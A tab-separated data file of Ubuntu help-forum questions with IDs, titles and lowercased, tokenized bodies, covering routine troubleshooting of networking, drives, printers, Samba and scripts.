408091	which desktop environment removes window borders/frames of full-screen windows by default ( or easy ) ?	another question lists a bunch of desktop environments . because of limited screen space ( 1024×600 ) , which of them make it easy to hide/remove window frames/borders/decorations ( including title bar ) for full screen windows ? the last time i did this with maximus ( configured not to maximize windows by itself ) , a gnome2 top panel and the “namebar applet” ( to see the window title in the panel ) . all three seem a little bit abandoned , so i look for alternatives ...
408095	ubuntu 13.10 sound not working after modifying fstab	i want to auto mount a ntfs partition after system start . therefore i edited /etc/fstab and added this new entry : uuid=someuuid /home/someusername ntfs defaults 0 2 mounting works but i have no sound anymore and the volume symbol in unity or gnome vanished . anyway if i mount the partition to /media/somename mounting and sound works . the partition contains the folders 'downloads ' and 'dropbox ' and 'pictures ' aswell as one file . i made sure my home folder does not contain those folders or files . i got the same problem if i move the home folder to another partition the same way as described on this website : https : //help.ubuntu.com/community/partitioning/home/moving what is the matter here and how can i solve it ?
408096	connected to wireless but no internet	i 'm connected to my wireless network but unable to connect to the internet . i restart my laptop several time but nothing happened . if i attempt to browse the web ( or do anything else that requires an internet connection ) , i get a `` connection not found '' error.i do n't think the problem is with the network or the hardware , because if i boot into windows , everything is fine . and also this is the output of ifconfig : eth0 link encap : ethernet hwaddr 10 : bf:48:48:84:63 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:68 errors:0 dropped:0 overruns:0 frame:0 tx packets:68 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:5092 ( 5.0 kb ) tx bytes:5092 ( 5.0 kb ) wlan0 link encap : ethernet hwaddr 44:6d:57 : c6:2f:04 inet addr:192.168.1.4 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :466d:57ff : fec6:2f04/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:7 errors:0 dropped:0 overruns:0 frame:0 tx packets:57 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:2482 ( 2.4 kb ) tx bytes:10856 ( 10.8 kb ) , $ ping -c3 www.google.com ping : unknown host www.google.com , $ cat /etc/resolv.conf # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # do not edit this file by hand -- your changes will be overwritten nameserver 127.0.1.1
408097	can ubuntu 13.10 use qq international without wine ?	the wine always crashes , so i do n't want to use it.can ubuntu 13.10 use qq international without wine ?
408098	can i install ubuntu touch in my tablet ?	i am using lava ivory tablet and my tab specification is processer - 1.2 dual core mediatek professor ram- 1 gb android version - 4.1.2 4gb internal memory ( actually use only 2gb ) so can i install ubuntu touch to my tab
408099	how to change executable file as application program ?	i got the executable file by running the c program and how to change executable file as software
408102	unable to use 'vi ' on ubuntu 12.04	whenever i try to open any text file using vi or vim , i get the following error , vim : error while loading shared libraries : libtcl8.5.so.0 : can not open shared object file : no such file or directory i compiled and installed tcl 8.6 from source to take care of this dependency but it still doesnt work . what could be the issue ?
408105	keep getting error messages	im new as hell to this so forgive me . i keep getting error messages when i try and convert .iso to .img . says no such file or directory . i know once i get the converted file i have to do a bunch of stuff . im just trying to get a bootable usb drive , and last time i did this it seemed like it was much much easier . what am i doing wrong ? os x 10.9.1 2g intel core duo/ 2g 1067mhz ddr3
408108	how to change boot drive in ubuntu ?	as shown in image , i want to change my boot drive . i want to choose 92 gb file system drive , please help how to change my booth drive from current drive to 92 gb drive , in that drive also have ubuntu , please help sudo lspci -nn
408110	can not get bluez 5.13 working on ubuntu 13.10	i 'm trying to get bluez 5.13 working with ubuntu 13.10 . i 've successfully compiled from source , but when i try to run the included python tests ( like simple-agent ) , i always get the error below . any ideas what 's wrong ? thanks . dennis @ ubuntu : ~/bluez-5.13/test $ sudo ./simple-agent [ sudo ] password for dennis : traceback ( most recent call last ) : file `` ./simple-agent '' , line 156 , in < module > obj = bus.get_object ( bus_name , `` /org/bluez '' ) ; file `` /usr/lib/python2.7/dist-packages/dbus/bus.py '' , line 241 , in get_object follow_name_owner_changes=follow_name_owner_changes ) file `` /usr/lib/python2.7/dist-packages/dbus/proxies.py '' , line 248 , in __init__ self._named_service = conn.activate_name_owner ( bus_name ) file `` /usr/lib/python2.7/dist-packages/dbus/bus.py '' , line 180 , in activate_name_owner self.start_service_by_name ( bus_name ) file `` /usr/lib/python2.7/dist-packages/dbus/bus.py '' , line 278 , in start_service_by_name 'su ' , ( bus_name , flags ) ) ) file `` /usr/lib/python2.7/dist-packages/dbus/connection.py '' , line 651 , in call_blocking message , timeout ) dbus.exceptions.dbusexception : org.freedesktop.dbus.error.spawn.childexited : launch helper exited with unknown return code 1
408113	lubuntu 13.10 and hp printer problems	i have a problem with getting my hp laserjet professional 1102w printer to actually print ; i have already downloaded and installed hplip and ran hp-setup in both the interactive mode as well as going through the gui version . i have also used the printing option under the system settings tab . anyways , the result of any of these methods is a `` configured printer '' in the eyes of the system . by that i mean the printer is seen on the network , uses the appropriate driver from hplip , shows the device as idle , etc . when i try and print a document from any application , the progress bar of the print process shows , then shows as rendering complete , the green status light on the printer blinks as if tho it is trying to print , but the end result is no document . any suggestions where to look ? all other computers , including the mac os x partition on this particular system in question , can print to this printer . i am confused as to where to go next with this and as such , many thanks in advance for advice that may be offered .
408114	how do i resolve the avogadro 1.1.0 build error below ?	i am building avogadro 1.1.0 in ubuntu 12.10.i have installed the dependencies openbabel , eigen , etc . but i always get the error below . **cmake error at cmakelists.txt:30 ( include ) : include called with wrong number of arguments . include only takes one file . cmake error at cmakelists.txt:65 ( qt4_automoc ) : unknown cmake command `` qt4_automoc '' . cmake warning ( dev ) in cmakelists.txt : no cmake_minimum_required command is present . a line of code such as cmake_minimum_required ( version 2.8 ) should be added at the top of the file . -- configuring incomplete , errors occurred ! make [ 2 ] : *** [ avogadro-prefix/src/avogadro-stamp/avogadro-configure ] error 1 make [ 1 ] : *** [ cmakefiles/avogadro.dir/all ] error 2 make : *** [ all ] error 2**
408115	ubuntu 12.04 work with hp pavilion touchsmart 11-e000sa notebook ?	i have windows 8.1 on this 11.6 '' touch notebook , 4gb ram and 500gb space so it can take ubuntu 12.04 64bit . but will i have any problems getting touch drivers ? and from where ? unlike dell , hp does not seem to have any link for drivers that i may need for the touch screen , etc . any help is welcome .
408116	ralink usb wifi completely locks up system	using ubuntu 12.04 after about 5 to 10 minutes of transferring files over rsync , my computer locks up completely . it happens everytime . the syslog repeats the error below dozens of times . kernel : [ 33172.840297 ] phy0 - > rt2x00usb_vendor_request : error - vendor request 0x07 failed for offset 0x308c with error -110 . some websites suggested to fix the problem by replacing the file /lib/firmware/rt2870.bin with a newer version . i replaced the file , but i continued to get the same errors . the newer version i tried has this md5sum : 36c944c3138125605d28c0a3a1338be9 if it helps , here is the output of lsusb | grep rt # lsusb | grep rt bus 001 device 003 : id 148f:2573 ralink technology , corp. rt2501/rt2573 wireless adapter here is the output of lsmod | grep rt # lsmod | grep rt xt_multiport 12597 2 x_tables 29938 5 xt_multiport , iptable_filter , xt_nat , xt_tcpudp , ip_tables rt73usb 31676 0 rt2x00usb 20779 1 rt73usb rt2x00lib 55503 2 rt73usb , rt2x00usb mac80211 630977 2 rt2x00usb , rt2x00lib cfg80211 525244 2 rt2x00lib , mac80211 parport_pc 28284 1 parport 46562 3 ppdev , parport_pc , lp crc_itu_t 12707 2 rt73usb , firewire_core i 'm trying to stop my computer from locking up from these errors .
408119	login ip 's file location	i like to know where the log files that store the ssh logins are located , the last login ip is shown when logged in via ssh so i 'm sure they are kept somewhere , can anyone shed som light on this ? system : ubuntu 12.04.4 lts thanks !
408121	my internal sata 3tb wd only data drive mounts only after shutdown , cant reboot	i am in need of some help.. tl ; dr : system works fine after shutdown , after reboot it cant find / wont mount data drive ( if i manually skip the mounting it works ) i am using ubuntu 12.04 ( server image ) , ~5days ago i fiddled with the drives a bit and now i am running into a problem . before 80gb ide for system , 1tb sata drive for data after ( the 80gb drive was very loud - made an iso with clonezilla and restored it on the 1tb sata drive ( copied the data from the 1tb drive beforehand to my new 3tb drive , which i formatted with gparted as ext4 ) data from 1tb sata - > new 3tb sata 80gb ide - > 1tb sata ( system ) removed the 80gb ide drive yesterday i was in need of system restart , so i did , i updated / upgrade beforehand . after the reboot , the second drive did not mount ( i am accessing the system through ssh , so i had to connect monitor + keyboard to it and troubleshoot it ) .. what i found out is that if i reboot the system , the 3tb drive does not mount . if i shutdown * the system boots again no problem . please help , thank you ! : ) info i used the blkid to find the id of the drive and put in fstab . /dev/sda1 : uuid= '' 83576843-1e37-457a-839a-2587d9780fb0 '' type= '' ext4 '' fstab # new 3tb uuid=83576843-1e37-457a-839a-2587d9780fb0 /home/whiller/here ext4 defaults motherboard - http : //www.asus.com/motherboards/p5vd2mx/ hdd - wd caviar green rx - 3tb * ( i even tried hard shutdown by disconnecting the power )
408122	question about dhcp server in ubuntu server 12.04	i configured a dhcp server , i then configured a client to take a dhcp ip . i need from server terminal to know the addresses released to my domain pcs .
408123	running apps have different icons from launchers-cairo dock-ubuntu 12.04	i am using cairo-dock and suddenly when i click on a launcher , a new icon appears to indicate the running app . you can see for instance the launchers for terminal and chrome . i 've search through cairo 's configure and i found in bahaviour -- - > taskbar -- - > representation that there is an option overwrite the x icon with the launcher 's icon . this option is selected by default , but the launchers do n't use the same icon as the running app . is there a way to fix that ?
408124	can not start ubuntu software manager and update manager in ubuntu12.04	an unresolvable problem occurred while initializing the package information . please report this bug against the 'update-manager ' package and include the following error message : e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/in.archive.ubuntu.com_ubuntu_dists_precise-updates_universe_i18n_translation-en , e : the package lists or status file could not be parsed or opened .
408130	list users in login screen in ubuntu server 12.04	is it possible to see which users currently exist in ubuntu server 12.04 in login prompt without authentication ? in command prompt , is such thing possible ?
408131	gitolite http access	at the beginning of the year i became the system ''admin '' of our server . in fact i am not really the system admin because i have no root rights . the funny thing is , that i must install all software by myself so it is really complicated . after weeks of begging , the guys with root rights installed gitolite with http acces for me . they used this tutorials : gitolite , http access so after the installation i created the *.httpasswd file for the http access using httpwasswd -bd < file > < user > < password > and added user to the gitolite config file ( and i pushed the update to the git server ; ) ) when i try to clone the repo , i get error : the requested url returned error : 500 while accessing http : // @ serverat/git/testing/info/refs fatal : http request failed i used following line to clone : git clone http : //user @ server/git/testing.git the log says : user < user > : authentication failure for `` /git/testing/info/refs '' : password mismatch fatal : errors found but logfile could not be created fatal : /home/gitolite/.gitolite/logs/gitolite-2014-01.log : permission denied fatal : http\targv= < user > \tsoc=git-upload-pack 'testing'\tfrom=clientip premature end of script headers : gitolite-suexec-wrapper.sh fatal : errors found but logfile could not be created fatal : /home/gitolite/.gitolite/logs/gitolite-2014-01.log : permission denied fatal : http\targv= < user > \tsoc=git-upload-pack 'testing'\tfrom=clientip premature end of script headers : gitolite-suexec-wrapper.sh so i think i understand gitolite because there is no ssh keyfile for the user ... does anyone what i forgot ? best regards from vienna , will
408133	keyboard and mouse is not working even in recovery mode and ctrl+alt+f1 is not working	i have installed ubuntu 12.04 but i got stuck in login screen . i have dual boot , both are ubuntu but different version of kernel . i had ubuntu 12.04 with kernel 3.8 and it is working fine but i have installed kernel 3.4 , at login screen of kernel 3.4 keyboard and mouse is not working . please guide . thank you .
408134	can testdisk be used from the same hard drive ?	i have accidentally removed two partitions . i installed testdisk and started analysing to detect the lost partitions . the lost partitions are in /dev/sda . my ubuntu installation and testdisk of course are also on /dev/sda . i want to recover the whole partitions not copy some data , which means i will have to write a new table . is this ok , both being on the same hard drive ? or do i have to do it from a live session ? this will need a new search and 4 more hours ! !
408135	combine two hard drives	i have a pc with 2 physical hard drives , each is 500 gb ( sda and sdb ) i 'd like to combine them in one large hard drive ( 1t ) . i could n't find a clear approach on how to do it . i tried lvm with no luck . any idea ?
408137	radeon r7 reported as hd 8600 `` oland '' on ubuntu 12.04 with amd proprietory driver	can anyone tell me why loaded latest fglrx ati/amd prorietory driver is identified as `` oland '' with radeon hd 6800 vga card ( command : fglrxinfo ) ; and also ccc identifies ( catalyst 13.12 stable installed ) my card as hd 8600 while my card is a radeon r7 250 ? since the drivers had worked ( till the latest package update wrecked my gui again * ) , i tend to believe it is normal . is it normal ?
408139	samsung galaxy pocket not installing from the bootstrap	i followed all the instructions to the letter from http : //www.ubuntu.com/phone/install , the only hiccup i got was on the backups so i did that manually and proceeded then all went well till the very end running the last command : phablet-flash ubuntu-system -- no-backup i got busted with this error : info : phablet-flash : device detected as gt-s5300 error : phablet - flash : unsupported device , autodetect device i 'm sure that the error is because my phone is not on the supported list samsung galaxy pocket gt-s5300 , 4 gig mem card and all other requirements are met i would like to test ubuntu phone on a older device before going app crazy ! ! when will you update the next cycle of phones and will you include the pocket ? nb ! ! did it change anything in my pc and if so how do remove the changes it created pc seems to be lagging and needed to boot in safe mode afterwards ? thanks
408140	how do i bond 2 wifi adapters in ubuntu 13.10	hi i want to bond 2 wifi adapters together with 802.3ad mode but i ca n't get it to work . i use ifenslave 2.6 and tried a lot of ways to do it . i want to bond my wifi because its slow at home and i want more speed . the wifi at home is protected with an wpa2-psk key . how can i bond it . everytime i tried it it gave me this error no slave joined bond0 , continuing anyway how can i get bonding to work ?
408142	how to take the executable file of the particular software and install in other system ?	how to take the executable file of the particular software and install in other system like we tacking back up in android applications
408145	can not run the blender from ubuntu 12.04	i installed blender 2.69 from ubuntu software center ( blender 2.69+svn61239+git201401181822.6cd132b-0irie1~precise1 ) on ubuntu 12.04 ( 32 bit ) , but when i run it from desktop it gives no reaction at all , when i try to run it from tty it says : unable to open display aborted ( core dumped ) what does it mean ? ? ?
408149	awesome does not create listing in gdm	i have installed awesome desktop from the terminal using apt-get . but it does not create a listing in the gdm during login . is there any way to create a listing in gdm ? also i am not able to edit the awesome.desktop file
408150	installed ubuntu 13.1 on laptop beside win7 - no option to boot into windows - have run boot-repair	as my title explains . after running boot repair , my log is at http : //paste.ubuntu.com/6784795/ i still get no option to boot into windows i would appreciate if someone could run an expert eye over the log and advise what my problem is and suggest some reading i can do to rectify it . my laptop boots successfully into ubuntu but i do not get a menu with a boot option for windows .
408154	ctrl+c / ctrl+v do n't work with pcmanfm	sometimes the file browser of my lubuntu os ( pcmanfm ) does n't accept ctrl+c / ctrl+v commands . i have to copy files using the mouse . ctrl+x have this random problem as well ; furthermore icons of files selected to be cut does n't change ( usually file browsers apply transparency to icons of cutting files ) . i have not found a known open bug . maybe keyboard is misconfigured ?
408156	script for trimming with ffmpeg	i 'm recording radio broadcasts via dvb-c and gnutv . to trim the recordings i use ffmpeg . the synthax takes rahter long to enter in terminal . so i 'm working on a script to automatize this . hiere it is : # ! /bin/bash # getting the input file : read -e -p `` enter the absolute path for the .mpg-file : `` path # start time of trimming : read -p `` where should the trimming start ? ( please enter in this format hh : mm : ss ) : `` start # end time of trimming : read -p `` when should the trimming end ? ( please enter in this format hh : mm : ss ) : `` end # informations about the song : read -p `` what song is it ? `` title read -p `` who sang it ? `` artist read -p `` which album ? '' album # determine the duration of trimming ( given in seconds ) . start2= $ ( echo $ start | awk -f : ' { print ( $ 1 * 3600 ) + ( $ 2 * 60 ) + $ 3 } ' ) end2= $ ( echo $ end | awk -f : ' { print ( $ 1 * 3600 ) + ( $ 2 * 60 ) + $ 3 } ' ) duration= $ ( expr $ end2 - $ start2 ) ffmpeg -ss $ anfang -i $ path -t $ duration -acodec copy -vcodec copy -metadata title= $ title -metadata author= $ artist $ title ' 路 ' $ artist'.mpg' when i run this script for `` st. elmos fire '' by `` john parr '' , i get : unable to find a suitable output format for 'elmo's' i think it is beacause of the whitespaces in $ title and $ artist . i already tried \ and '' as well as the -e option for read . but it produces a similar error message . what am i doing wrong ? best regards an thanks in advance , markus
408158	@ reboot crontab vs startup script	what is the difference between using @ reboot cron and writing a startup script ( a script in /etc/init.d ) ? in which scenarios should one be chosen over another ?
408159	does landscape support ubuntu derivatives ?	can we add an ubuntu derivative to list of computers to manage in ubuntu landscape or just ubuntu ? at least the official ones ( lubuntu , xubuntu , etc . ) .
408161	unable to locate package fpc	when i try to install any package through the command line , i get an error . can anyone help me on this ? reading package lists ... done building dependency tree reading state information ... done e : unable to locate package update e : unable to locate package fpc and here 's the snapshot .
408165	wifi does n't work kubuntu 13.10	i am new to kububtu 13.10 on a dell d531 and can not get wifi to work and this is the result from ifconfig : eth0 link encap : ethernet hwaddr 00:1c:23:87 : ff:72 inet addr:192.168.1.109 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :21c:23ff : fe87 : ff72/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:75648 errors:0 dropped:0 overruns:0 frame:0 tx packets:49650 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:98861266 ( 98.8 mb ) tx bytes:5475135 ( 5.4 mb ) interrupt:18 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:2006 errors:0 dropped:0 overruns:0 frame:0 tx packets:2006 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:291373 ( 291.3 kb ) tx bytes:291373 ( 291.3 kb )
408166	export dist-upgrade packages to file	in dist-upgrade i want to use it in init3 and i dont have x and my internet speed is low . how to export dist-upgrade download packages to file to get another pc ?
408167	trying to mount an external hard drive	i have an external hard drive which i plug in . when i go to disk utility it says it 's there but i ca n't mount it in order to copy or move files from it . ? ? have n't tried anything in the terminal yet , as i 'm not sure where to go with that . when i type in sudo blkid to list the file systems , here is what comes up /dev/sda1 : uuid= '' 37816aba-85b5-476a-aedf-a1cd3f0db76b '' type= '' ext4 '' /dev/sda5 : uuid= '' a35c094d-e6eb-4b6d-a63a-8303ae2f567f '' type= '' swap '' /dev/sdb5 : uuid= '' 58dea4d5-89e7-4e28-838f-8d26598a226b '' type= '' swap '' i only have this one computer so i am not sure whether it works on other pc's/os 's . the partition type is linux ( 0x83 ) when i look at it in the disk utility , it says the device is /dev/sdb1 . i ca n't even check filesystem . i tried mounting it manually , sudo mount /dev/sdb1 /media/external and it comes up with this . `mount : you must specify the filesystem type .
408169	no display backlight after boot on my notebook	i insttalled ubuntu 13.10 on my compaq presario cq-41 209tu notebook.but whenever it comes on login screen , display backlight turns to 0.why ? please help me .
408173	can not connect to the network anymore using dhcp	it 's an apartment house 's network and the connection worked fine for two days until yesterday . problems are same plugging in directly with network cable or using a switch . if i boot with windows , then the computer connects to the network automatically and everything works . i ran ipconfig and put the same ip , netmask , gateway into linux connection settings and had to add a free dns ip and now i 've got internet in ubuntu as well , but automatical connection with dhcp does n't work anymore edit : concerning mohammed 's comment : i reckon linux optains dhcp settings , as connection is established , but something goes wrong and internet and ping does n't work . network seems to have some fault as if it works pages does n't load from first time sometimes and you have to reload . same pc running with windows connects to dhcp , i ve got other devices : nexus 4 , ipad and other windows pc which connect to network , only ubuntu has this issue , that i must set the ip settings manually edit : here is my ifconfig , eth0 has working manual settings , wifi has faulty automatic : eth0 link encap : ethernet hwaddr 00:1e:8c:96:6d : f4 inet addr:10.0.3.92 bcast:10.0.255.255 mask:255.255.0.0 inet6 addr : fe80 : :21e:8cff : fe96:6df4/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:58264 errors:0 dropped:0 overruns:0 frame:0 tx packets:38696 errors:0 dropped:0 overruns:0 carrier:4 collisions:0 txqueuelen:1000 rx bytes:17918222 ( 17.9 mb ) tx bytes:6479348 ( 6.4 mb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:12668 errors:0 dropped:0 overruns:0 frame:0 tx packets:12668 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:949325 ( 949.3 kb ) tx bytes:949325 ( 949.3 kb ) wlan0 link encap : ethernet hwaddr 00:1d : e0:69:77 : bd inet addr:10.0.1.145 bcast:10.0.255.255 mask:255.255.0.0 inet6 addr : fe80 : :21d : e0ff : fe69:77bd/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:10675 errors:0 dropped:0 overruns:0 frame:0 tx packets:1336 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:1108136 ( 1.1 mb ) tx bytes:214623 ( 214.6 kb ) this is how it looks under windows ( wifi is first ) : drahtlos-lan-adapter drahtlosnetzwerkverbindung : verbindungsspezifisches dns-suffix : devario verbindungslokale ipv6-adresse . : fe80 : :adda:6f7b:5524 : da7b % 17 ipv4-adresse . . . . . . . . . . : 10.0.4.93 subnetzmaske . . . . . . . . . . : 255.255.0.0 standardgateway . . . . . . . . . : 10.0.0.2 ethernet-adapter lan-verbindung : verbindungsspezifisches dns-suffix : devario verbindungslokale ipv6-adresse . : fe80 : :191a:8c17 : f2b4:5e0 % 10 ipv4-adresse . . . . . . . . . . : 10.0.3.92 subnetzmaske . . . . . . . . . . : 255.255.0.0 standardgateway . . . . . . . . . : 10.0.0.2 routing table : route kernel ip routing table destination gateway genmask flags metric ref use iface default 10.0.0.2 0.0.0.0 ug 0 0 0 eth0 10.0.0.0 * 255.255.0.0 u 1 0 0 eth0 10.0.0.0 * 255.255.0.0 u 2 0 0 wlan0 link-local * 255.255.0.0 u 1000 0 0 eth0
408174	how do i import my music and photos to ubuntu installed on vmware virtual machine ?	i have installed ubuntu in vmware , and i want to import all my movies , music and photos , to vmware ubuntu . how do you guys suggest i should do this ?
408175	adding sudo permissions to nis clienadding sudo permissions to nis clients	i 've configured a couple of ubuntu 12.04 servers with nfs and nis like it was described in https : //help.ubuntu.com/community/settingupnishowto and in https : //help.ubuntu.com/community/settingupnfshowto it works great , and i can login to the nis/nfs-clients and my home directory gets loaded . unfortunately it is not possible to gain sudo permissions on these clients , while the same user has sudo-permissions on the nis-master-server . transferring the master-servers /etc/sudoers file to the clients did not work for me either .
408177	unable to set proper screen resolution on ubuntu	basically , i 've done all of the correct steps in creating the resolution for myself ... $ xrandr -- newmode `` 1824x1036_60.00 '' a bunch of number -hsync +vsync ( i 'm on another computer so i ca n't copy and paste ^ ) it all works fine , but it adds that particular resolution to the table contents `` dvi-d-0 '' when i 'm actually using hdmi . so when i attempt to change the resolution via xrandr on my hdmi monitor , it does n't know what i 'm referring to by `` 1824x1036_60.00 '' . any help would be appreciated ! : ) p.s the resolution is weird because its a weird monitor . it has no native . fletcher @ fletcher-desktop : ~ $ xrandr -q screen 0 : minimum 8 x 8 , current 1280 x 720 , maximum 16384 x 16384 vga-0 connected ( normal left inverted right x axis y axis ) 1024x768 60.0 + 1360x768 60.0 59.8 1152x864 60.0 800x600 72.2 60.3 56.2 680x384 119.9 119.6 640x480 59.9 512x384 120.0 400x300 144.4 320x240 120.1 hdmi-0 connected 1280x720+0+0 ( normal left inverted right x axis y axis ) 708mm x 398mm 1280x720 60.0*+ 59.9 50.0 1920x1080 59.9 50.0 30.0 25.0 24.0 30.0 30.0 25.0 1024x768 60.0 800x600 60.3 720x576 50.0 25.0 720x480 60.0 59.9 30.0 dvi-d-0 disconnected ( normal left inverted right x axis y axis ) 1808x1036_60.00 ( 0x2c3 ) 155.8mhz h : width 1808 start 1920 end 2112 total 2416 skew 0 clock 64.5khz v : height 1036 start 1039 end 1049 total 1075 clock 60.0hz 1808_1036_60.00 ( 0x2c4 ) 155.8mhz h : width 1808 start 1920 end 2112 total 2416 skew 0 clock 64.5khz v : height 1036 start 1039 end 1049 total 1075 clock 60.0hz 1804_1036_60.00 ( 0x2c9 ) 155.8mhz h : width 1808 start 1920 end 2112 total 2416 skew 0 clock 64.5khz v : height 1036 start 1039 end 1049 total 1075 clock 60.0hz 1920x1200_60.00 ( 0x2ca ) 193.2mhz h : width 1920 start 2056 end 2256 total 2592 skew 0 clock 74.6khz v : height 1200 start 1203 end 1209 total 1245 clock 59.9hz 1824x1036_60.00 ( 0x2cb ) 156.8mhz h : width 1824 start 1936 end 2128 total 2432 skew 0 clock 64.5khz v : height 1036 start 1039 end 1049 total 1075 clock 60.0hz 1824x1036_59.00 ( 0x2d2 ) 154.0mhz h : width 1824 start 1936 end 2128 total 2432 skew 0 clock 63.3khz v : height 1036 start 1039 end 1049 total 1074 clock 59.0hz 1824x1036_30.00 ( 0x2d4 ) 72.5mhz h : width 1824 start 1880 end 2056 total 2288 skew 0 clock 31.7khz v : height 1036 start 1039 end 1049 total 1057 clock 30.0hz
408178	why does the printer print an extra page containing `` p : //poppler.freedesktop.org '' ?	i received an hp 255 with ubuntu 12.04 lts . when i print a pdf file on my lexmark t640 it prints a extra page , on which the only text is : p : //poppler.freedesktop.org but for me it 's a really big problem , because i print very much documents , and for any document i print , i print another blank page with `` p : //poppler.freedesktop.org '' . how can i stop ubuntu from printing this unnecessary extra page ?
408179	unable to add windows machine in samba pdc	i have created local user and gave him smbpasswd but not able to add windows machine my samba file configuration is as follows : - behaviour of samba but the option is considered important enough to be mentioned here # note : whenever you modify this file you should run the command '' testparm '' to check that you have not made any basic syntactic errors . a well-established practice is to name the original file '' smb.conf.master '' and create the `` real '' config file with testparm -s smb.conf.master > smb.conf this minimizes the size of the really used smb.conf file which , according to the samba team , impacts performance however , use this with caution if your smb.conf file contains nested '' include '' statements . see debian bug # 483187 for a case where using a master file is not a good idea . # ======================= global settings ======================= [ global ] browsing/identification change this to the workgroup/nt-domain name your samba server will part of workgroup = server netbios name = server server string is the equivalent of the nt description field server string = % h server ( samba , ubuntu ) windows internet name serving support section : wins support - tells the nmbd component of samba to enable its wins server wins support = yes wins server - tells the nmbd components of samba to be a wins client note : samba can be either a wins server , or a wins client , but not both ; wins server = w.x.y.z this will prevent nmbd to search for netbios names through dns . dns proxy = no what naming service and in what order should we use to resolve host names to ip addresses name resolve order = wins lmhosts host bcast networking the specific set of interfaces / networks to bind to this can be either the interface name or an ip address/netmask ; interface names are normally preferred ; interfaces = 127.0.0.0/8 eth0 only bind to the named interfaces and/or networks ; you must use the 'interfaces ' option above to use this . it is recommended that you enable this feature if your samba machine is not protected by a firewall or is a firewall itself . however , this option can not handle dynamic or non-broadcast interfaces correctly . ; bind interfaces only = yes debugging/accounting this tells samba to use a separate log file for each machine that connects log file = /var/log/samba/log. % m cap the size of the individual log files ( in kib ) . max log size = 1000 if you want samba to only log through syslog then set the following parameter to 'yes ' . syslog only = no we want samba to log a minimum amount of information to syslog . everything should go to /var/log/samba/log . { smbd , nmbd } instead . if you want to log through syslog you should set the following parameter to something higher . syslog = 0 do something sensible when samba crashes : mail the admin a backtrace panic action = /usr/share/samba/panic-action % d # authentication '' security = user '' is always a good idea . this will require a unix account in this server for every user accessing the server . see /usr/share/doc/samba-doc/htmldocs/samba3-howto/servertype.html in the samba-doc package for details . security = user you may wish to use password encryption . see the section on 'encrypt passwords ' in the smb.conf ( 5 ) manpage before enabling . ; encrypt passwords = yes if you are using encrypted passwords , samba will need to know what password database type you are using . ; passdb backend = tdbsam obey pam restrictions = yes this boolean parameter controls whether samba attempts to sync the unix password with the smb password when the encrypted smb password in the passdb is changed . unix password sync = yes for unix password sync to work on a debian gnu/linux system , the following parameters must be set ( thanks to ian kahan < for sending the correct chat script for the passwd program in debian sarge ) . passwd program = /usr/bin/passwd % u passwd chat = *enter\snew\s*\spassword : * % n\n *retype\snew\s*\spassword : * % n\n *password\supdated\ssuccessfully* . this boolean controls whether pam will be used for password changes when requested by an smb client instead of the program listed in 'passwd program ' . the default is 'no ' . pam password change = yes this option controls how unsuccessful authentication attempts are mapped to anonymous connections map to guest = bad user # # # # domains is this machine able to authenticate users . both pdc and bdc must have this setting enabled . if you are the bdc you must change the 'domain master ' setting to no # domain logons = yes domain master = yes local master = yes preferred master = yes os level = 64 # the following setting only takes effect if 'domain logons ' is set it specifies the location of the user 's profile directory from the client point of view ) the following required a [ profiles ] share to be setup on the samba server ( see below ) logon path = \\ % n\profiles\ % u another common choice is storing the profile in the user 's home directory ( this is samba 's default ) the following setting only takes effect if 'domain logons ' is set it specifies the location of a user 's home directory ( from the client point of view ) logon drive = h : logon home = \\ % n\ % u the following setting only takes effect if 'domain logons ' is set it specifies the script to run during logon . the script must be stored in the [ netlogon ] share note : must be store in 'dos ' file format convention ; logon script = logon.cmd this allows unix users to be created on the domain controller via the samr rpc pipe . the example command creates a user account with a disabled unix password ; please adapt to your needs ; add user script = /usr/sbin/adduser -- quiet -- disabled-password -- gecos `` '' % u this allows machine accounts to be created on the domain controller via the samr rpc pipe . the following assumes a `` machines '' group exists on the system add machine script = /usr/sbin/useradd -g machines -c `` % u machine account '' -d /var/lib/samba -s /bin/false % u this allows unix groups to be created on the domain controller via the samr rpc pipe . ; add group script = /usr/sbin/addgroup -- force-badname % g # # # # printing if you want to automatically load your printer list rather than setting them up individually then you 'll need this load printers = yes lpr ( ng ) printing . you may wish to override the location of the printcap file ; printing = bsd ; printcap name = /etc/printcap cups printing . see also the cupsaddsmb ( 8 ) manpage in the cupsys-client package . ; printing = cups ; printcap name = cups # # # # # # misc using the following line enables you to customise your configuration on a per machine basis . the % m gets replaced with the netbios name of the machine that is connecting ; include = /home/samba/etc/smb.conf. % m most people will find that this option gives better performance . see smb.conf ( 5 ) and /usr/share/doc/samba-doc/htmldocs/samba3-howto/speed.html for details you may want to add the following on a linux system : so_rcvbuf=8192 so_sndbuf=8192 socket options = tcp_nodelay the following parameter is useful only if you have the linpopup package installed . the samba maintainer and the linpopup maintainer are working to ease installation and configuration of linpopup and samba . ; message command = /bin/sh -c 